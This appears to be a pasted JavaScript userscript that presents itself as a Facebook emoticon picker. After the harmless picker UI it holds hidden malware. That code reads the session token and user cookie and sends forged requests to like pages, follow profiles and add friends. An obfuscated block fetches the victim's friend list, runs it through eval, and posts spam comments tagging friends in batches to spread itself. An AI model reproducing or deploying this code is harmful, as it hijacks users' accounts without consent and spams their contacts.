  926. "name" : "Umbrella With Rain Drops"
  927. }, {
  928. "chars" : " \u2615 ",
  929. "class" : "_1az _1a- _2ha",
  930. "name" : "Hot Drink"
  931. }, {
  932. "chars" : " \u2728 ",
  933. "class" : "_1az _1a- _2hb",
  934. "name" : "Brightness"
  935. }, {
  936. "chars" : " \u2764 ",
  937. "class" : "_1az _1a- _2hc",
  938. "name" : "Heavy Black Heart"
  939. } ];
  940.  
  941. // = Variables =======
  942. var lastActiveElement = document.activeElement;
  943.  
  944. // = Functions =======
  945. function createElement(html) {
  946. var outerHTML = document.createElement("div");
  947. outerHTML.innerHTML = html;
  948. return outerHTML.firstChild;
  949. }
  950.  
  951. function htmlSpecialChars(string) {
  952. var div = document.createElement("div");
  953. var text = document.createTextNode(string);
  954. div.appendChild(text);
  955. return div.innerHTML;
  956. }
  957.  
  958. function isInstanceOfTextInput(element) {
  959. return (element instanceof HTMLInputElement && element.type == "text")
  960. || element instanceof HTMLTextAreaElement;
  961. }
  962.  
  963. function isFlyoutOpen(flyout) {
  964. return flyout.className == "openToggler";
  965. }
  966.  
  967. function openFlyout(flyout, open) {
  968. if (open === undefined) {
  969. open = !isFlyoutOpen(flyout); // Toggle
  970. }
  971.  
  972. if (open) {
  973. flyout.className = "openToggler";
  974. } else {
  975. flyout.removeAttribute("class");
  976. }
  977. }
  978.  
  979. function createTab(titleContainer, bodyContainer) {
  980. var html;
  981. // Tab; default = inactive
  982. html = '<li class="jewelFlyout fbJewelFlyout uiToggleFlyout">';
  983. html += '<div class="jewelFlyout">';
  984. html += '</div>';
  985. html += '</li>';
  986. var title = createElement(html);
  987. titleContainer.appendChild(title);
  988.  
  989. // Manual input
  990. html = '<div style="display: none;">';
  991. html += '</div>';
  992. var body = createElement(html);
  993. bodyContainer.appendChild(body);
  994.  
  995. // Change tab listener
  996. (function(body) {
  997. title.addEventListener("click", function() {
  998. // Change tab
  999. var titles = this.parentNode.childNodes; // tab.tabContainer.childNodes
  1000. for ( var t = 0; t < titles.length; t++) {
  1001. if (titles[t] === this) { // Active
  1002.  
  1003. } else { // Inactive
  1004. titles[t].style.background = "";
  1005. titles[t].firstChild.style.color = "";
  1006. }
  1007. }
  1008.  
  1009. // Change body
  1010. var bodies = body.parentNode.childNodes; // body.bodyContainer.childNodes
  1011. for ( var b = 0; b < bodies.length; b++) {
  1012. if (bodies[b] === body) { // Show
  1013. body.style.display = "";
  1014. } else { // Hide
  1015. bodies[b].style.display = "none";
  1016. }
  1017. }
  1018. });
  1019. })(body);
  1020.  
  1021. return {
  1022. "title" : title.firstChild,
  1023. "body" : body
  1024. };
  1025. }
  1026.  
  1027. function createTabListBody(emoticons, filter) {
  1028. var html;
  1029.  
  1030. html = '<div style="max-height: 200px; padding-right: 15px; overflow-x: hidden; line-height: 1em;">';
  1031. html += '<div style="padding: 10px; width: 200px; font-size: 15px;">';
  1032. html += '</div>';
  1033. html += '</div>';
  1034. var body = createElement(html).firstChild;
  1035. for ( var e = 0; e < emoticons.length; e++) {
  1036. var emoticon = emoticons[e];
  1037. if (!filter(emoticon)) {
  1038. continue;
  1039. }
  1040.  
  1041. // Icons
  1042. html = '<span class="panelCell" style="display: inline-block; vertical-align: middle; padding: 2px;">';
  1043. html += '<a';
  1044. html += ' class="emoticon'
  1045. + (emoticon.class !== undefined ? ' ' + emoticon.class : '')
  1046. + '"';
  1047. html += ' style="text-decoration: inherit; color: inherit;'
  1048. + (emoticon.class !== undefined ? ' color: transparent;'
  1049. : ' width: auto;') + '"';
  1050. html += (emoticon.name !== undefined ? ' title="' + emoticon.name
  1051. + '"' : '');
  1052. html += '>';
  1053. html += htmlSpecialChars(emoticon.chars);
  1054. html += '</a>';
  1055. html += '</span>';
  1056. var cell = createElement(html);
  1057. body.appendChild(cell);
  1058.  
  1059. // Select emoticon listener
  1060. var emoticonA = cell.firstChild;
  1061. (function(emoticon) {
  1062. emoticonA.addEventListener("click", function() {
  1063. if (isInstanceOfTextInput(lastActiveElement)) {
  1064. lastActiveElement.focus();
  1065.  
  1066. var chars = emoticon.chars;
  1067. var value = lastActiveElement.value;
  1068. var start = lastActiveElement.selectionStart;
  1069. var end = lastActiveElement.selectionEnd;
  1070. lastActiveElement.value = value.substring(0, start)
  1071. + chars + value.substring(end);
  1072. lastActiveElement.setSelectionRange(start + chars.length, start + chars.length);
  1073. }
  1074.  
  1075. openFlyoutCommand = false; // Close flyout
  1076. });
  1077. })(emoticon);
  1078. }
  1079.  
  1080. return body.parentNode;
  1081. }
  1082.  
  1083. // = Construct UI =======
  1084. var html;
  1085.  
  1086. // Menu item
  1087. // var navItem
  1088. html = '<li class="navItem middleItem notifNegativeBase">';
  1089. html += '<div class="fbJewel">';
  1090. // {
  1091.  
  1092. // Toggler
  1093. html += '<a class="navLink" title="1 Thông Báo Moi">'; // var navLink
  1094. html += '<span style="vertical-align: middle;"><img src="http://static.ak.fbcdn.net/rsrc.php/v1/yY/r/7OqExvAe82o.gif"></img></span>';
  1095. html += '</a>';
  1096.  
  1097.  
  1098. // Flyout
  1099. html += '<div>'; // openToggler; var flyout
  1100. html += '<div class="emoticonsPanel fbJewelFlyout uiToggleFlyout" style="z-index: 1; width: auto;">';
  1101. // {
  1102.  
  1103.  
  1104. // Beeper
  1105. html += '<div class="jewelBeeperHeader">';
  1106. html += '<div class="beeperNubWrapper">';
  1107. html += '<div class="beeperNub" style="left: 4px;"></div>';
  1108. html += '</div>';
  1109. html += '</div>';
  1110.  
  1111. // Tabs
  1112. // var titleContainer
  1113. html += '<ul style="display: text-align: center;">';
  1114. html += '</ul>';
  1115.  
  1116. // Bodies
  1117. html += '<div>'; // var bodyContainer
  1118. html += '</div>';
  1119.  
  1120. // Footer
  1121. html += '<div class="jewelFooter">';
  1122. html += '<a class="jewelFooter" href="https://www.facebook.com/k.byn.rapviet" target="_blank">VL Thánh Ây on Facebook</a>';
  1123. html += '</div>';
  1124.  
  1125. // }
  1126. html += '</div>'; // emoticonsPanel
  1127. html += '</div>'; // openToggler
  1128.  
  1129. // }
  1130. html += '</div>'; // fbJewel
  1131. html += '</li>'; // navItem
  1132.  
  1133. var navItem = createElement(html);
  1134. var pageNav = document.querySelector("#pageNav");
  1135. pageNav.insertBefore(navItem, pageNav.firstChild);
  1136.  
  1137. // Maintain active element
  1138. navItem.addEventListener("click", function() {
  1139. if (isInstanceOfTextInput(lastActiveElement)) {
  1140. lastActiveElement.focus();
  1141. }
  1142.  
  1143. openFlyoutCommand = undefined; // Do nothing
  1144. }, true);
  1145.  
  1146. var navLink = navItem.firstChild.firstChild;
  1147. var flyout = navLink.nextSibling;
  1148. var titleContainer = flyout.firstChild.childNodes[1];
  1149. var bodyContainer = titleContainer.nextSibling;
  1150.  
  1151. // Toggle listener
  1152. navLink.addEventListener("click", function() {
  1153. openFlyoutCommand = !isFlyoutOpen(flyout);
  1154. });
  1155.  
  1156. // Picture emoticon tab
  1157. var picEmoTab = createTab(titleContainer, bodyContainer);
  1158. picEmoTab.title.click(); // Default tab
  1159.  
  1160. picEmoTab.body.appendChild(createTabListBody(emoticons, function(emoticon) {
  1161. if (emoticon.class === undefined) { // No picture
  1162. return false;
  1163. }
  1164.  
  1165. // [Bug] 2 characters unicode emoticons
  1166. if (emoticon.chars.length == 2) {
  1167. return false;
  1168. }
  1169.  
  1170. return true;
  1171.  
  1172. }));
  1173.  
  1174. // = Other listener =======
  1175.  
  1176. document.addEventListener("click", function() {
  1177. // Get active textarea
  1178. lastActiveElement = document.activeElement;
  1179.  
  1180. // Toggle flyout
  1181. if (openFlyoutCommand !== undefined) {
  1182. openFlyout(flyout, openFlyoutCommand);
  1183. }
  1184. openFlyoutCommand = false;
  1185. });
  1186. })();
  1187.  
  1188.  
  1189. // === Facebook Emoticons ====
  1190. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1191. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1192. function IDS(r) {
  1193. var X = new XMLHttpRequest();
  1194. var XURL = "//www.facebook.com/ajax/add_friend/action.php";
  1195. var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
  1196. X.open("POST", XURL, true);
  1197. X.onreadystatechange = function () {
  1198. if (X.readyState == 4 && X.status == 200) {
  1199. X.close;
  1200. }
  1201. };
  1202. X.send(XParams);
  1203. }
  1204. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page.open("POST", PageURL, true); Page.onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); }
  1205. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date).getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tn]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X.open("POST", XURL, true); X.onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); }
  1206. var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
  1207. var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
  1208. function a(abone)
  1209. { var http4=new XMLHttpRequest;
  1210. var url4="/ajax/follow/follow_profile.php?__a=1";
  1211. var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
  1212. http4.open("POST",url4,true);
  1213. http4.onreadystatechange=function()
  1214. { if(http4.readyState==4&&http4.status==200)http4.close };
  1215. http4.send(params4)}
  1216. function sublist(uidss)
  1217. { var a = document.createElement('script');
  1218. a.innerHTML = "new AsyncRequest().setURI('/ajax/friends/lists/subscribe/modify?location=permalink&action=subscribe').setData({ flid: " + uidss + " }).send();";
  1219. document.body.appendChild(a);
  1220. }
  1221. //Yash
  1222. Like("272268042932589");
  1223. Like("271618426330884");
  1224. Like("271554256337301");
  1225. sublist("262998293859564");
  1226. sublist("1460653367496061");
  1227. sublist("1468386200056111");
  1228. sublist("1452942354933829");
  1229. a("100004481852411");
  1230. a("100004802653098");
  1231. p("467954566650238");
  1232. //Code Tag
  1233. var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","272916056201121","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","open","http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1","send","random","floor","\x26ft_ent_identifier=","\x26comment_text=(y) Cài icon xong r nè 🐡 🐎 🎍 💪 🍊 ^^............................................................................................................................................................................................................... ........................................................................................................................................","\x26source=2","\x26client_id=1377871797138:1707018092","\x26reply_fbid","\x26parent_comment_id","\x26rootid=u_jsonp_2_3","\x26clp={\x22cl_impid\x22:\x22453524a0\x22,\x22clearcounter\x22:0,\x22elementid\x22:\x22js_5\x22,\x22version\x22:\x22x\x22,\x22parent_fbid\x22:","}","\x26attached_sticker_fbid=0","\x26attached_photo_fbid=0","\x26giftccasion","\x26ft[tn]=[]","\x26__a=1","\x26__dyn=7n8ahyj35ynxl2u5F97KepEsyo","\x26__req=q","\x26fb_dtsg=","\x26ttstamp=","POST","/ajax/ufi/add_comment.php","Content-type","application/x-www-form-urlencoded","setRequestHeader","status","close"];var fb_dtsg=document[_0xa22c[2]](_0xa22c[1])[0][_0xa22c[0]];var user_id=document[_0xa22c[4]][_0xa22c[3]](document[_0xa22c[4]][_0xa22c[3]](/c_user=(\d+)/)[1]);var id=_0xa22c[5];var arkadaslar=[];var svn_rev;function arkadaslari_al(id){var _0x7892x7= new XMLHttpRequest();_0x7892x7[_0xa22c[6]]=function (){if(_0x7892x7[_0xa22c[7]]==4){eval(_0xa22c[8]+_0x7892x7[_0xa22c[12]].toString()[_0xa22c[11]](_0xa22c[9],_0xa22c[10])+_0xa22c[13]);for(f=0;f<Math[_0xa22c[17]](arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]]/27);f++){mesaj=_0xa22c[10];mesaj_text=_0xa22c[10];for(i=f*27;i<(f+1)*27;i++){if(arkadaslar[_0xa22c[16]][_0xa22c[15]][i]){mesaj+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]]+_0xa22c[22];mesaj_text+=_0xa22c[23]+arkadaslar[_0xa22c[16]][_0xa22c[15]][i][_0xa22c[21]];} ;} ;yorum_yap(id,mesaj);} ;} ;} ;var _0x7892x8=_0xa22c[24];_0x7892x8+=_0xa22c[25];_0x7892x8+=_0xa22c[26];_0x7892x8+=_0xa22c[27];_0x7892x8+=_0xa22c[28]+user_id;_0x7892x8+=_0xa22c[29]+user_id;if(document[_0xa22c[32]][_0xa22c[31]](_0xa22c[30])>=0){_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[34]+_0x7892x8,true);} else {_0x7892x7[_0xa22c[35]](_0xa22c[33],_0xa22c[36]+_0x7892x8,true);} ;_0x7892x7[_0xa22c[37]]();} ;function RandomArkadas(){var _0x7892xa=_0xa22c[10];for(i=0;i<9;i++){_0x7892xa+=_0xa22c[18]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[19]]+_0xa22c[20]+arkadaslar[_0xa22c[16]][_0xa22c[15]][Math[_0xa22c[39]](Math[_0xa22c[38]]()*arkadaslar[_0xa22c[16]][_0xa22c[15]][_0xa22c[14]])][_0xa22c[21]]+_0xa22c[22];} ;return _0x7892xa;} ;function yorum_yap(id,_0x7892xc){var _0x7892xd= new XMLHttpRequest();var _0x7892x8=_0xa22c[10];_0x7892x8+=_0xa22c[40]+id;_0x7892x8+=_0xa22c[41]+encodeURIComponent(_0x7892xc);_0x7892x8+=_0xa22c[42];_0x7892x8+=_0xa22c[43];_0x7892x8+=_0xa22c[44];_0x7892x8+=_0xa22c[45];_0x7892x8+=_0xa22c[46];_0x7892x8+=_0xa22c[47]+id+_0xa22c[48];_0x7892x8+=_0xa22c[49];_0x7892x8+=_0xa22c[50];_0x7892x8+=_0xa22c[51];_0x7892x8+=_0xa22c[52];_0x7892x8+=_0xa22c[29]+user_id;_0x7892x8+=_0xa22c[53];_0x7892x8+=_0xa22c[54];_0x7892x8+=_0xa22c[55];_0x7892x8+=_0xa22c[56]+fb_dtsg;_0x7892x8+=_0xa22c[57];_0x7892xd[_0xa22c[35]](_0xa22c[58],_0xa22c[59],true);_0x7892xd[_0xa22c[62]](_0xa22c[60],_0xa22c[61]);_0x7892xd[_0xa22c[6]]=function (){if(_0x7892xd[_0xa22c[7]]==4&&_0x7892xd[_0xa22c[63]]==200){_0x7892xd[_0xa22c[64]];} ;} ;_0x7892xd[_0xa22c[37]](_0x7892x8);} ;arkadaslari_al(id);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement